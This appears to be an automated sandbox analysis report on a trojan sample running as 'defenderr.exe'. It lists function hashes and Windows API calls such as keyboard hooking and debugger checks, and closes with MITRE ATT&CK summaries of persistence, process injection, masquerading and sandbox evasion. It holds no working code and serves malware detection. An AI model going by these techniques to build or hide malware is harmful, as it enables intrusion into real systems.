Instruction ID: f3148e6f8c99fb207e884ec78d30df905a394f8b940d215f944b6a2a89040c3d
Opcode Fuzzy Hash: 0fd150b3e0c5eac11035266ecac95752da6cf27f41ce9db7aca45ef8d1e30b27
Instruction Fuzzy Hash: 9531223180875C8FCB59DF58C88A7E97BF0EF65321F0542ABD48AD7252D774A806CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC18048D Relevance: .8, Instructions: 810
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.561131601.00007FFBAC180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffbac180000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 539fc90738368075c3304aeaf1671710b4a6c1033d683e4bf14924574fe954d9
Instruction ID: 6e86c9185f0dfc6d05622506572881bf350a1afff30df0f9c67ad1157280c809
Opcode Fuzzy Hash: 539fc90738368075c3304aeaf1671710b4a6c1033d683e4bf14924574fe954d9
Instruction Fuzzy Hash: 053223B1B1D9494FEB4DDB2C84995357BD2EF98301B5442BED84ACB297DE34E8038784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1862BD Relevance: 1.8, APIs: 1, Instructions: 255
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNEL32 ref: 00007FFBAC186480

Memory Dump Source

Source File: 0000000B.00000002.561131601.00007FFBAC182000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC182000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffbac182000_HEUR-Trojan.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 830cf619d28553d0637791fd07ff620a1eb5e49ea3fa7d2529575a4b7383f13f
Instruction ID: 3f565fa3533f75ecf7d05b139a3812782bde9058a88f8b0ab5167beac293d0ad
Opcode Fuzzy Hash: 830cf619d28553d0637791fd07ff620a1eb5e49ea3fa7d2529575a4b7383f13f
Instruction Fuzzy Hash: 99819170A18A1C8FDB98EF58D845BE9B7F1FF98310F1081AAD44DD3251CA34A986CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC185BAD Relevance: 1.7, APIs: 1, Instructions: 212
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 00007FFBAC185D1C

Memory Dump Source

Source File: 0000000B.00000002.561131601.00007FFBAC182000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC182000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffbac182000_HEUR-Trojan.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 95b221b8ed5e98096d21536f3e9447ad4d3216e66c352dfeb5167fdff0b7fd8c
Instruction ID: 3c0b5f787401e3520f5b7566980d0564c22f7f2b5288fa66641c18d7f78941ad
Opcode Fuzzy Hash: 95b221b8ed5e98096d21536f3e9447ad4d3216e66c352dfeb5167fdff0b7fd8c
Instruction Fuzzy Hash: 4D61AFB0909A8C8FEB59DF28C8597E93BE1FF55311F00426BE84DC7292DB74E8458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC18D588 Relevance: 1.6, APIs: 1, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFBAC18D651

Memory Dump Source

Source File: 0000000B.00000002.561131601.00007FFBAC182000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC182000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffbac182000_HEUR-Trojan.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: f2c0eb3b9b39194a9be452cd88edad6116bcd1b6cc516da7670151a59995309c
Instruction ID: e5a2681c38d428c446400383a6abdce77498f1f8e04812867cdf451f20b249e7
Opcode Fuzzy Hash: f2c0eb3b9b39194a9be452cd88edad6116bcd1b6cc516da7670151a59995309c
Instruction Fuzzy Hash: 8F410A7191CA1D8FDB19EB6CD8466F97BE0EB59321F00427ED04DD3292DA74A812C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1824B0 Relevance: 1.6, APIs: 1, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FFBAC18E330

Memory Dump Source

Source File: 0000000B.00000002.561131601.00007FFBAC182000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC182000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffbac182000_HEUR-Trojan.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 845cbd96c67568612b287890b84371a7c1df16cd0b5c56075b50b33818c44e39
Instruction ID: 7a1fe36daa45d233143698b4518bb1f61533faf7f525d5cd7bdbb3cbef690509
Opcode Fuzzy Hash: 845cbd96c67568612b287890b84371a7c1df16cd0b5c56075b50b33818c44e39
Instruction Fuzzy Hash: A731247190CA1C8FDB58DF5CC84ABB97BE0EF65321F04416ED48AD3252CB74A856CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC180C15 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.561131601.00007FFBAC180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffbac180000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4031062b8cdf1ff8af67b14d5d2dd31a50100dc956590b949234cae731317668
Instruction ID: 026310841dc71f71ce78fce7c1d5760912da0425d2f0cb79a2167a5925f8b0cb
Opcode Fuzzy Hash: 4031062b8cdf1ff8af67b14d5d2dd31a50100dc956590b949234cae731317668
Instruction Fuzzy Hash: 24A1B8A1E1DA4E4BE79AEB3884596A2F790FF94300F0405BAD44FC35A3ED28F445C766

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: defenderr.exePID: 2080, Parent PID: 6648COMMON

Executed Functions

Function 00007FFBAC1B048D Relevance: 2.1, Strings: 1, Instructions: 814COMMON

Download Yara Rule

Strings

P I, xrefs: 00007FFBAC1B04CB

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID: P I
API String ID: 0-158935604
Opcode ID: 0c1a1f01188c68d46ac9a4c5fffaac0875b8bcb28b4f045cbcb721aaf6ee0cdf
Instruction ID: 171f71262e72a3a8b24cd4d4b946c6370af00b41595224b266e921ad8000d86a
Opcode Fuzzy Hash: 0c1a1f01188c68d46ac9a4c5fffaac0875b8bcb28b4f045cbcb721aaf6ee0cdf
Instruction Fuzzy Hash: F43259F1B199494FE74DDB2CC499535B7D2EF98701B5482BED84ACB297DE24E8038B80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B0160 Relevance: 1.0, Instructions: 1004COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e94696c03a72aaaf7e96077cc21b409c8cda966049c7a0842a9d00016daccc0
Instruction ID: 3ba2642b18cdfead36d3305b9b73dca9fafd26cada380ab559176d270571d402
Opcode Fuzzy Hash: 4e94696c03a72aaaf7e96077cc21b409c8cda966049c7a0842a9d00016daccc0
Instruction Fuzzy Hash: 6862E3B0719A098FE71AEB28C48897573E2FF94704B20467DD88BC7696DE35F842CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B0178 Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FFBAC1B0FDE

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: 545d49a73f74a9188ee38ca7ead1b6c19c398fef1ead5324a1dfdf795f132466
Instruction ID: 9cdda6416add4df064dd4820ab0e756861eff01ae0dae0675e6ee4cea1a5d373
Opcode Fuzzy Hash: 545d49a73f74a9188ee38ca7ead1b6c19c398fef1ead5324a1dfdf795f132466
Instruction Fuzzy Hash: A9714AE1B1D6460FE35B9B3888591A5B7D1EF85700F1481BED48ECB2E3ED28E8428781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B0F88 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FFBAC1B0FDE

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: 5a1c32d9d872204baadb1727658a5af565680e62e02b2d33672704dadbc03835
Instruction ID: bf1b4df02139f6b1d830adfe91ec7249e656bfc20188bcea316196274867180f
Opcode Fuzzy Hash: 5a1c32d9d872204baadb1727658a5af565680e62e02b2d33672704dadbc03835
Instruction Fuzzy Hash: A62167A2B29A590FD30ED93D9C8506477C6EBC9701718C27EE48BCB3D6EC24EC068681

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B4341 Relevance: .9, Instructions: 945COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c6b79f83e70cbe7c9562de59e1fad7af30837a85decf4e63c02f364d40df51d
Instruction ID: bf1a0e86ccb619bf836c39268e149ac44cd581889697a43069cc73f4da79baa9
Opcode Fuzzy Hash: 5c6b79f83e70cbe7c9562de59e1fad7af30837a85decf4e63c02f364d40df51d
Instruction Fuzzy Hash: D8627EA1B0895A8FEB86EB28C4597A57392FF98700F5445B9D40EC72D6CE39EC46CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B37D8 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca630c858ae1c4342497786a5119dd093a235e682ceafd5a59f3744067995ba6
Instruction ID: 59dfdd42b24d9e449c42cb2c833f3c8c582dd53087220019991cdf36a5c76db5
Opcode Fuzzy Hash: ca630c858ae1c4342497786a5119dd093a235e682ceafd5a59f3744067995ba6
Instruction Fuzzy Hash: 21D1B422A19E5D8FE789EB6CC4996F6B7A1FF54300F40067AD04EC32E3DD246846D761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B3439 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e949beb8ef1d079845f82057da6e0f833d13f1787ea3117af601191a2ed5b26d
Instruction ID: 33ddcd85f0dad8e299ee787c8998e59d46b525820351d32406317ea05824d713
Opcode Fuzzy Hash: e949beb8ef1d079845f82057da6e0f833d13f1787ea3117af601191a2ed5b26d
Instruction Fuzzy Hash: 439106B2B0D95E8FEB9BEB3CD4582B877D1EF98710B4401BAD40DC7292DE18E8128751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B0C15 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4dcca16cc6e3371b7366ef1b2f3ec81fb4b1d0631840aa5fc5c406e33b87bfc
Instruction ID: 56411111b6772332424f32237546050fed5a0229da948d87e0c4f703a77c9be1
Opcode Fuzzy Hash: f4dcca16cc6e3371b7366ef1b2f3ec81fb4b1d0631840aa5fc5c406e33b87bfc
Instruction Fuzzy Hash: 89A1FAE2E1DA4A4AE39BEB3C84152A5B790EF94710F0446BAD44FC35E3ED28F446C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B3FF5 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9887ee701c8ca01adf951975bab42259b8d648882abe7a536673bc119a599c49
Instruction ID: 6d814d1552692f21a66737df0eaff1acc6c7a87529f8ed96300c7a47bad329a4
Opcode Fuzzy Hash: 9887ee701c8ca01adf951975bab42259b8d648882abe7a536673bc119a599c49
Instruction Fuzzy Hash: 41913D707089188FDB99EB2CC459BA977E2FF98701B5545B9E40DC72A6CE34DC42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B1989 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d90c938930abfed106ba20a390cf8ec618f08d76ca0aed3ba1e9aa4b5e857211
Instruction ID: 4c4cc7e43bd4ce6083b6fa65413617745630b11cb360f376b3970007e64a0a7a
Opcode Fuzzy Hash: d90c938930abfed106ba20a390cf8ec618f08d76ca0aed3ba1e9aa4b5e857211
Instruction Fuzzy Hash: 095192B0719A098FD71BEB28C4989B573A2FFA4304B6145BDC54BC76A1DE35F846CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B5009 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bed5c621fed76481cf8d573785dbe1c711e5c5c515357be51da57700e937be56
Instruction ID: a2878f19ad81dbb0e851cb9783f69d99925b6f83aa6d3d0444d900513dac6dd5
Opcode Fuzzy Hash: bed5c621fed76481cf8d573785dbe1c711e5c5c515357be51da57700e937be56
Instruction Fuzzy Hash: E351C1B1A09A5E8FDF96EB68C8596F977B1FF45304F1401B9D40ED7292CA34A842CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC09F5A0 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573061812.00007FFBAC09D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC09D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac09d000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d85d793ab006ea8c437d71c643abaf61c515b2f99d8a401dface57bd573b79c
Instruction ID: fb49fb8345b4aab47d859025f19e31bb738c69948b90425a68cf7c8f1cfd9222
Opcode Fuzzy Hash: 3d85d793ab006ea8c437d71c643abaf61c515b2f99d8a401dface57bd573b79c
Instruction Fuzzy Hash: 2041D07040EBC44FD75ADB389845A923FF0EF56320B1501DFD488CB1A7D625A846C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B3BE5 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80744af8f329791d4a93549fb9517701d785f136162820a51bedfa93a3e8e81d
Instruction ID: b21a65c65eeda4c286d6f8c497137a4968ada097ed739efac379182a806e475a
Opcode Fuzzy Hash: 80744af8f329791d4a93549fb9517701d785f136162820a51bedfa93a3e8e81d
Instruction Fuzzy Hash: 7E21F6A2B0D95A4FE796EB7C84592B9A7D1EF94300F04057AD04FC3193DD28A80B9B91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B50F3 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 224c1854c671d7e02d58c35abaaf158b55055fa53f09892e4a642ee1f8cee4ea
Instruction ID: b9b3d03b7d405bb688bdd08cb0fd60f0181e76f6f76b1f66ada79491fee28ab6
Opcode Fuzzy Hash: 224c1854c671d7e02d58c35abaaf158b55055fa53f09892e4a642ee1f8cee4ea
Instruction Fuzzy Hash: 623118B0A0961E8FEF55EB68C495AADB7B1FF45704F100179D40EE7296CA38A842CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B1F64 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7384c5d4b58ede32d29b6df4e467e3e28ed7f6aee271734b45770567b967485e
Instruction ID: 0138c94dbfd54490b9e5c61d3a0035eabd54752ed4d921ae62dfc28f305c855f
Opcode Fuzzy Hash: 7384c5d4b58ede32d29b6df4e467e3e28ed7f6aee271734b45770567b967485e
Instruction Fuzzy Hash: AC11926171E66A0FE70BA334C4994F17BA1EF46321B6841FED459CB187D91CE44BC740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B3CE8 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e0ed7a91ac3a04540abf9ce4495945dba71f18485b8a75b3f89877a8424784
Instruction ID: 2ef1eabc2784f5ede0ec0f8029d59046d6d6080a8be407e94624c3afdd2b66d9
Opcode Fuzzy Hash: c7e0ed7a91ac3a04540abf9ce4495945dba71f18485b8a75b3f89877a8424784
Instruction Fuzzy Hash: 7B11E6B3F0881D4FEB85EBACD8151FDBBA2FF84240F800236D509D31D1DE2869068790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B017D Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9de6e8be5a1a6620f1117656314c04ebf08d04ceea67c41f80e6926181f66bec
Instruction ID: 4b704ada86aeb3f12d83aa2b32d7666ea19360d94ae08554075f491840356f87
Opcode Fuzzy Hash: 9de6e8be5a1a6620f1117656314c04ebf08d04ceea67c41f80e6926181f66bec
Instruction Fuzzy Hash: 6A018EA7B0D5650FD265D63EF4950EE3BE0DFC5632704467FD48EC3152DE14A84B4690

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B1BC1 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa1fb8012e9865b41901f6459cf020f46ae3c85c53b18f2e05d2ff121aca326f
Instruction ID: 4750eec42ccc63606a620ec31f9af4aeb30270c09b71024dbb44915738d71b43
Opcode Fuzzy Hash: aa1fb8012e9865b41901f6459cf020f46ae3c85c53b18f2e05d2ff121aca326f
Instruction Fuzzy Hash: 31F07DA1B0CB850FD7AAC63DA4010A57BE1EFC923130547BBD489C3246EA14AC4347C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B30DD Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4896a0388c62a2d206ca849f0f52268330fd77b5717653ea35660d69f8b181cf
Instruction ID: 49023e3547c3a8692b31e73a5d6da6ede3e90f631a739219dca0eedbe99a3a16
Opcode Fuzzy Hash: 4896a0388c62a2d206ca849f0f52268330fd77b5717653ea35660d69f8b181cf
Instruction Fuzzy Hash: 33014FB090E78D5FDB42AB3884595A97FB0EF06200F4445ABE84CC6193CE389555CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B01D0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49efe42c61d431b2dfaff8c8002883feb90acced4333ae1c77e6debe82cb9975
Instruction ID: 65a26a04e3aea97d2eeb137ce9788b6eca7be40a9f3cdc103c2d12daab94a3c1
Opcode Fuzzy Hash: 49efe42c61d431b2dfaff8c8002883feb90acced4333ae1c77e6debe82cb9975
Instruction Fuzzy Hash: 25F0E9B1F0CA190B96A9D52DA40612973D1EBC8621705477BD84ED3355DE24B8424780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B3361 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9497985c6bfa9197f89faa39fe6eb389ec2a10af443960c39115a254affb74
Instruction ID: 231313033afb0cce9e37b3562dc1466e32a7ba2fd1be21b5d6daf42d83182d38
Opcode Fuzzy Hash: 3b9497985c6bfa9197f89faa39fe6eb389ec2a10af443960c39115a254affb74
Instruction Fuzzy Hash: 16F0245050DA884FE726973C44183A27F91AF92340F0880FAD48DC709BDA286508D3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B3409 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a2c8ccd31022e76e29168f3f4be6bd9170c0948ac42f99b7c4e18132bab302f
Instruction ID: 332a4c4e5dab2ad465d9231fd27e45f65e830b64aedf7f0f228f7bb5d1257447
Opcode Fuzzy Hash: 1a2c8ccd31022e76e29168f3f4be6bd9170c0948ac42f99b7c4e18132bab302f
Instruction Fuzzy Hash: F4E0C2B2B0D80A9FCB97E62CC0054A4B7A0FF843003104ABAD00EC31A5DE24E809CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1B3F4A Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.573476140.00007FFBAC1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac1b0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bca24ba1893509ac0b9c8c43136286b1d14edf00327d27c3a0a464336c34c68
Instruction ID: 27781294fd1b73019079becc428d04433195678946fd9dc319f9cf88c1d0123d
Opcode Fuzzy Hash: 9bca24ba1893509ac0b9c8c43136286b1d14edf00327d27c3a0a464336c34c68
Instruction Fuzzy Hash: C3D05E7154EA1ECFDB45FB3C844A1283260EB16641B5448B8D40CCB296EA259959C722

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
